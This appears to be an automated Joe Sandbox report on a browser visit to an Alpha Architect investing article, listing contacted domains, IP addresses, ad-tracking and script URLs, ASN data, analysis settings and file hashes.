                thrtle.com
                34.233.219.14
                truefalse
                  high
                  match.adsrvr.org
                  52.223.40.198
                  truefalse
                    high
                    pixel.tapad.com
                    34.111.113.62
                    truefalse
                      high
                      match.prod.bidr.io
                      34.249.70.63
                      truefalse
                        high
                        alphaarchitect.com
                        141.193.213.10
                        truefalse
                          unknown
                          s.twitter.com
                          104.244.42.3
                          truefalse
                            high
                            api.hcaptcha.com
                            104.19.230.21
                            truefalse
                              high
                              printfriendly.b-cdn.net
                              89.35.237.170
                              truefalse
                                high
                                a.remarketstats.com
                                104.26.3.122
                                truefalse
                                  high
                                  hcaptcha.com
                                  104.19.230.21
                                  truefalse
                                    high
                                    js.hcaptcha.com
                                    104.19.229.21
                                    truefalse
                                      high
                                      a.clickcertain.com
                                      172.67.74.207
                                      truefalse
                                        high
                                        analytics.google.com
                                        172.217.171.238
                                        truefalse
                                          high
                                          td.doubleclick.net
                                          172.217.19.194
                                          truefalse
                                            high
                                            d1fdcqniejar0f.cloudfront.net
                                            3.164.85.129
                                            truefalse
                                              unknown
                                              www.printfriendly.com
                                              104.26.8.127
                                              truefalse
                                                high
                                                cookiesync-446990137.us-west-2.elb.amazonaws.com
                                                54.149.202.3
                                                truefalse
                                                  high
                                                  newassets.hcaptcha.com
                                                  104.19.230.21
                                                  truefalse
                                                    high
                                                    static.ads-twitter.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      tag.trovo-tag.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        cdn.printfriendly.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          i.liadm.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            analytics.twitter.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              a.usbrowserspeed.com
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                NameMaliciousAntivirus DetectionReputation
                                                                https://pluralism.themancav.com/NGNU7k9BN4dQQW7cAld4zEcXMZ4WWXaPWgI4l04GC4hEQXjMRkFuzF8MMpZNCi2CXggwgFEFLZpSBj+bFh4=false
                                                                  high
                                                                  https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fitvids.js?ver=1733842125false
                                                                    unknown
                                                                    https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/mc4wp-premium/ajax-forms/assets/js/ajax-forms.js?ver=1733842125false
                                                                      unknown
                                                                      https://pluralism.themancav.com/ijOKmPER6fHuEbCqvAemuvlH7+ioCaj0613u8eRU1f7jX++6phH4urAR+uDlWajlfalse
                                                                        high
                                                                        https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-tooltip.js?ver=1733842125false
                                                                          unknown
                                                                          https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.requestAnimationFrame.js?ver=1733842125false
                                                                            unknown
                                                                            https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/jquery-form/jquery-form.min.js?ver=2.9.1false
                                                                              unknown
                                                                              https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-functions.min.js?ver=2.9.1false
                                                                                unknown
                                                                                https://alphaarchitect.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6false
                                                                                  unknown
                                                                                  https://pixel.tapad.com/idsync/ex/receive/check?partner_id=3318&partner_device_id=355cc50d-f67c-485f-9153-f0a0ddff6935&partner_url=https%3a%2f%2fa%2eclickcertain%2ecom%2fpx%2fta%2f%3fdone%3dtrue%26ta_id%3d%24%7bTA_DEVICE_ID%7dfalse
                                                                                    high
                                                                                    https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.time.min.js?ver=3.6.2false
                                                                                      unknown
                                                                                      https://alphaarchitect.com/wp-content/cache/min/1/enterprise/core.js?ver=1734350104false
                                                                                        unknown
                                                                                        https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-select.js?ver=1733842125false
                                                                                          unknown
                                                                                          https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-bg.js?ver=1733842125false
                                                                                            unknown
                                                                                            https://pluralism.themancav.com/0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ==false
                                                                                              high
                                                                                              https://pluralism.themancav.com/iZn9gPK7nuntu8eyv63RovrtmPCro9/s6PeZ6ef+ovP9+Inzq7Xf8/27x7Olu4+is7uM+uHpl/Lh8pLv4buAfalse
                                                                                                high
                                                                                                https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/cssua.js?ver=1733842125false
                                                                                                  unknown
                                                                                                  https://alphaarchitect.com/wp-content/themes/Avada/includes/lib/assets/fonts/icomoon/awb-icons.wofffalse
                                                                                                    unknown
                                                                                                    https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/cropper/cropper.min.js?ver=1.6.1false
                                                                                                      unknown
                                                                                                      https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/wp-quicklatex/js/wp-quicklatex-frontend.js?ver=1733842125false
                                                                                                        unknown
                                                                                                        https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.transition.js?ver=1733842125false
                                                                                                          unknown
                                                                                                          https://api2.hcaptcha.com/checksiteconfig?v=b4956db&host=alphaarchitect.com&sitekey=ed3e0640-f796-48d4-b830-0b3669decd80&sc=1&swa=1&spst=1false
                                                                                                            high
                                                                                                            https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-alert.js?ver=1733842125false
                                                                                                              unknown
                                                                                                              https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-fade.js?ver=1733842125false
                                                                                                                unknown
                                                                                                                https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fade.js?ver=1733842125false
                                                                                                                  unknown
                                                                                                                  https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion.js?ver=1733842125false
                                                                                                                    unknown
                                                                                                                    https://i.liadm.com/s/56408?bidder_id=200441&bidder_uuid=355cc50d-f67c-485f-9153-f0a0ddff6935&ccid=355cc50d-f67c-485f-9153-f0a0ddff6935&redir=https%253a%252f%252fcm%252eg%252edoubleclick%252enet%252fpixel%253fgoogle_nid%253dclickcertain%2526google_cm%253d1%2526google_sc%253d1%2526redir%253dhttps%25253a%25252f%25252fsecure%25252eadnxs%25252ecom%25252fgetuidu%25253fhttps%25253a%25252f%25252fa%25252eclickcertain%25252ecom%25252fpx%25252fimg%25252fbidswitch%25252f%25253fdone%25253dtrue%252526ccid%25253d355cc50d%25252df67c%25252d485f%25252d9153%25252df0a0ddff6935%252526anx_uId%25253d%252524UIDfalse
                                                                                                                      high
                                                                                                                      https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/vimeoPlayer.js?ver=1733842125false
                                                                                                                        unknown
                                                                                                                        https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/um-confirm/um-confirm.min.js?ver=1.0false
                                                                                                                          unknown
                                                                                                                          https://www.printfriendly.com/api/v3/domain_settings/a?callback=pfMod.saveDSSettings&hostname=alphaarchitect.com&client_version=clientfalse
                                                                                                                            high
                                                                                                                            https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.sticky-kit.js?ver=1733842125false
                                                                                                                              unknown
                                                                                                                              https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-container.js?ver=1733842125false
                                                                                                                                unknown
                                                                                                                                https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/mailchimp-for-wp/assets/js/forms.js?ver=1733842125false
                                                                                                                                  unknown
                                                                                                                                  https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/swiper.js?ver=1733842125false
                                                                                                                                    unknown
                                                                                                                                    https://a.usbrowserspeed.com/cs?puid=4fb965c5-16ea-5d92-8eb3-ebb71d1ea0d9&pid=lc&r=https%3a%2f%2fa%2eclickcertain%2ecom%2fpx%2ft%2f%3fdone%3dtrue%26rid%3d35b401bb%2ddd38%2d4632%2d8412%2d1dce28eac56b%26uid%3d%24%7bDEVICE_ID%7d%26hem%3d%24%7bHEM_SHA256_LOWERCASE%7dfalse
                                                                                                                                      high
                                                                                                                                      https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/disable-gravity-forms-fields/disable-gf-fields.js?ver=1733842125false
                                                                                                                                        unknown
                                                                                                                                        https://pluralism.themancav.com/812BPoh/4leXf7sMxWmtHIAp5E7RZ6NSkjPlV5063k2HPPVN0XGjTYd/uw/ff/McyX/tVZ5//A==false
                                                                                                                                          high
                                                                                                                                          https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/fileupload/fileupload.js?ver=1733842125false
                                                                                                                                            unknown
                                                                                                                                            https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-button.js?ver=1733842125false
                                                                                                                                              unknown
                                                                                                                                              https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-scrollspy.js?ver=1733842125false
                                                                                                                                                unknown
                                                                                                                                                https://api.hcaptcha.com/checksiteconfig?v=b4956db&host=alphaarchitect.com&sitekey=ed3e0640-f796-48d4-b830-0b3669decd80&sc=1&swa=1&spst=1false
                                                                                                                                                  high
                                                                                                                                                  https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-scripts.min.js?ver=2.9.1false
                                                                                                                                                    unknown
                                                                                                                                                    https://alphaarchitect.com/wp-content/plugins/hcaptcha-for-forms-and-more/assets/js/hcaptcha-gravity-forms.min.js?ver=4.8.0false
                                                                                                                                                      unknown
                                                                                                                                                      https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-modal.min.js?ver=2.9.1false
                                                                                                                                                        unknown
                                                                                                                                                        https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-animations.js?ver=1733842125false
                                                                                                                                                          unknown
                                                                                                                                                          https://alphaarchitect.com/wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-regular-400.woff2false
                                                                                                                                                            unknown
                                                                                                                                                            https://alphaarchitect.com/wp-includes/js/wp-util.min.js?ver=d4c9c51d21a0c26e910ec9a6a2b06883false
                                                                                                                                                              unknown
                                                                                                                                                              https://pluralism.themancav.com/NpKLjU2w6ORSsLG/AKanr0Xm7v0UqKnhV/zv5Fj11P5C8//+FL6p/kKwsb8asPmvDLDz+kz25edY/eP/RuD94lroqfA=false
                                                                                                                                                                high
                                                                                                                                                                https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/tipsy/tipsy.min.js?ver=1.0.0afalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.ilightbox.js?ver=1733842125false
                                                                                                                                                                    unknown
                                                                                                                                                                    https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/modernizr.js?ver=1733842125false
                                                                                                                                                                      unknown
                                                                                                                                                                      https://alphaarchitect.com/wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2false
                                                                                                                                                                        unknown
                                                                                                                                                                        https://a.clickcertain.com/px/?c=2645100a8c95db0&rid=35b401bb-dd38-4632-8412-1dce28eac56bfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://newassets.hcaptcha.com/c/fe8bf5a16a9db504f8aba2aec3f8f5eb2c013bd8a80f6268abbae03fe760d754/hsw.jsfalse
                                                                                                                                                                            high
                                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                            https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-functions.min.js?ver=2.9.chromecache_163.2.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://stats.g.doubleclick.net/g/collectchromecache_162.2.dr, chromecache_324.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://alphaarchitect.com/chromecache_163.2.drfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://alphaarchitect.com/wp-content/uploads/2017/08/favicon.pngchromecache_163.2.drfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/mc4wp-premium/ajax-forms/assetschromecache_163.2.drfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://alphaarchitect.com/category/turnkey-behavioral-finance/chromecache_163.2.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://github.com/select2/select2/blob/master/LICENSE.mdchromecache_303.2.dr, chromecache_279.2.dr, chromecache_143.2.dr, chromecache_241.2.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://academicinsightsoninvesting.com/chromecache_163.2.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://alphaarchitect.com/2024/12/global-factor-performance-december-2024/chromecache_163.2.drfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://alphaarchitect.com/feed/chromecache_163.2.drfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://a.remarketstats.com/px/smart/?c=2645100a8c95db0&seg=chromecache_147.2.dr, chromecache_225.2.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://www.linkedin.com/in/alphaarchitect/detail/recent-activity/chromecache_163.2.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://alphaarchitect.com/contactchromecache_163.2.drfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://alphaarchitect.com/?s=chromecache_163.2.drfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://alphaarchitect.com/disclaimer/chromecache_163.2.drfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.time.min.chromecache_163.2.drfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://fengyuanchen.github.io/cropperjschromecache_245.2.dr, chromecache_263.2.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.printfriendly.comchromecache_294.2.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://a.clickcertain.com/px/cont/?c=2645100a8c95db0&ccid=355cc50d-f67c-485f-9153-f0a0ddff6935&cn=Uchromecache_293.2.dr, chromecache_231.2.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://www.linkedin.com/company/alphaarchitectllcchromecache_163.2.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/select2/select2.full.min.jchromecache_163.2.drfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://schema.orgchromecache_163.2.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/common-frontend.min.js?ver=2chromecache_163.2.drfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://alphaarchitect.com/author/elisabettabasilico/chromecache_163.2.drfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/ultimate-member/assets/libs/selchromecache_163.2.drfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://alphaarchitect.com/#/schema/person/e8282a8635fe5e9327df61e89b0e36adchromecache_163.2.drfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://alphaarchitect.com/2024/12/momentum-determinants/chromecache_163.2.drfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://alphaarchitect.com/subscribe/chromecache_163.2.drfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/raty/um-raty.min.js?ver=2.chromecache_163.2.drfalse
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://a.usbrowserspeed.com/cs?puid=4fb965c5-16ea-5d92-8eb3-ebb71d1ea0d9&pid=lc&r=https%3a%2f%2fa%2chromecache_235.2.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://alphaarchitect.com/wp-content/uploads/compliance/indexes/Firm_Overview_vF.pdfchromecache_163.2.drfalse
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          http://alphaarchitect.com/category/architect-academic-insights/academic-research-insight/chromecache_163.2.drfalse
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://yoast.com/wordpress/plugins/seo/chromecache_163.2.drfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://x.com/chromecache_163.2.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/mailchimp-top-bar/assets/scriptchromecache_163.2.drfalse
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://alphaarchitect.com/termschromecache_163.2.drfalse
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-responsive.min.js?ver=2.9chromecache_163.2.drfalse
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://alphaarchitect.com/#websitechromecache_163.2.drfalse
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://alphaarchitect.com/category/architect-academic-insights/tactical-asset-allocation/chromecache_163.2.drfalse
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.min.js?vechromecache_163.2.drfalse
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/tipsy/tipsy.min.js?ver=1.0chromecache_163.2.drfalse
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://academicinsightsoninvesting.comchromecache_163.2.drfalse
                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                https://cdn.printfriendly.com/icons/globe.svgchromecache_286.2.dr, chromecache_294.2.drfalse
                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                  https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/mailchimp-for-wp/assets/js/formchromecache_163.2.drfalse
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    https://alphaarchitect.com/2020/09/can-we-use-the-shiller-cape-ratio-to-forecast-country-returns/chromecache_163.2.drfalse
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      https://googleads.g.doubleclick.netchromecache_324.2.drfalse
                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                        64.233.167.156
                                                                                                                                                                                                                                                                        stats.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        172.67.74.207
                                                                                                                                                                                                                                                                        a.clickcertain.comUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        142.250.181.132
                                                                                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        172.67.69.73
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        172.217.19.194
                                                                                                                                                                                                                                                                        td.doubleclick.netUnited States
                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        104.19.230.21
                                                                                                                                                                                                                                                                        api.hcaptcha.comUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        34.233.219.14
                                                                                                                                                                                                                                                                        thrtle.comUnited States
                                                                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                        89.35.237.170
                                                                                                                                                                                                                                                                        printfriendly.b-cdn.netRomania
                                                                                                                                                                                                                                                                        34304TEENTELECOMROfalse
                                                                                                                                                                                                                                                                        62.60.154.114
                                                                                                                                                                                                                                                                        pluralism.themancav.comIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                                                        15611IROST-ASIRfalse
                                                                                                                                                                                                                                                                        104.26.8.127
                                                                                                                                                                                                                                                                        www.printfriendly.comUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        162.159.140.229
                                                                                                                                                                                                                                                                        t.coUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        104.26.3.122
                                                                                                                                                                                                                                                                        a.remarketstats.comUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        3.164.85.129
                                                                                                                                                                                                                                                                        d1fdcqniejar0f.cloudfront.netUnited States
                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                        199.232.168.157
                                                                                                                                                                                                                                                                        platform.twitter.map.fastly.netUnited States
                                                                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                                                                        104.26.8.50
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        3.164.85.128
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                        104.244.42.67
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        13414TWITTERUSfalse
                                                                                                                                                                                                                                                                        34.249.70.63
                                                                                                                                                                                                                                                                        match.prod.bidr.ioUnited States
                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                        104.244.42.3
                                                                                                                                                                                                                                                                        s.twitter.comUnited States
                                                                                                                                                                                                                                                                        13414TWITTERUSfalse
                                                                                                                                                                                                                                                                        34.111.113.62
                                                                                                                                                                                                                                                                        pixel.tapad.comUnited States
                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        54.149.202.3
                                                                                                                                                                                                                                                                        cookiesync-446990137.us-west-2.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                        3.225.89.177
                                                                                                                                                                                                                                                                        idaas-ext.cph.liveintent.comUnited States
                                                                                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                        141.193.213.10
                                                                                                                                                                                                                                                                        alphaarchitect.comUnited States
                                                                                                                                                                                                                                                                        396845DV-PRIMARY-ASN1USfalse
                                                                                                                                                                                                                                                                        141.193.213.11
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        396845DV-PRIMARY-ASN1USfalse
                                                                                                                                                                                                                                                                        104.19.229.21
                                                                                                                                                                                                                                                                        api2.hcaptcha.comUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                                                                                        52.223.40.198
                                                                                                                                                                                                                                                                        match.adsrvr.orgUnited States
                                                                                                                                                                                                                                                                        8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                                                                                                                        172.217.171.238
                                                                                                                                                                                                                                                                        analytics.google.comUnited States
                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                                                        192.168.2.4
                                                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                        Analysis ID:1578803
                                                                                                                                                                                                                                                                        Start date and time:2024-12-20 13:43:35 +01:00
                                                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                        Overall analysis duration:0h 3m 38s
                                                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                                                        Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                                        Sample URL:https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                        Number of analysed new started processes analysed:8
                                                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                                                        Classification:mal48.win@19/326@80/29
                                                                                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.201.35, 172.217.19.206, 64.233.162.84, 172.217.17.46, 142.250.181.67, 199.232.210.172, 216.58.208.232, 172.217.19.10, 172.217.19.170, 172.217.19.234, 142.250.181.42, 142.250.181.74, 142.250.181.106, 172.217.19.202, 172.217.17.42, 172.217.17.74, 172.217.21.42, 142.250.181.138, 192.229.221.95, 142.250.201.14, 142.250.181.142, 172.217.17.35, 23.218.208.109, 20.12.23.50, 172.202.163.200, 13.107.246.63
                                                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, www.googletagmanager.com, update.googleapis.com, clients.l.google.com
                                                                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                        • VT rate limit hit for: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        No simulations
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4104)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4117
                                                                                                                                                                                                                                                                        Entropy (8bit):5.05711795608586
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:ROf/zELqzJRMmgQPx8OJtPT2ImC6Oq4Bflt:ROXzEWj/UOJtPAC33t
                                                                                                                                                                                                                                                                        MD5:B0823273C7DBA63CDD568FA7BA262153
                                                                                                                                                                                                                                                                        SHA1:816E9CD896813DA8DE46D80D1A444C5C4AFE0DD7
                                                                                                                                                                                                                                                                        SHA-256:03F381FA9F6C66DCF1C810BCDA049AE4221065A23383E434C38BCED0B53888CC
                                                                                                                                                                                                                                                                        SHA-512:5EF8400648B46885227D898D7966E4126811B28319339E41A7F0B5ADFA26E37C0D312C805B6EB710DE7E1451839FDA94A09EC48CB792896D9C5BD0DA23E1C835
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
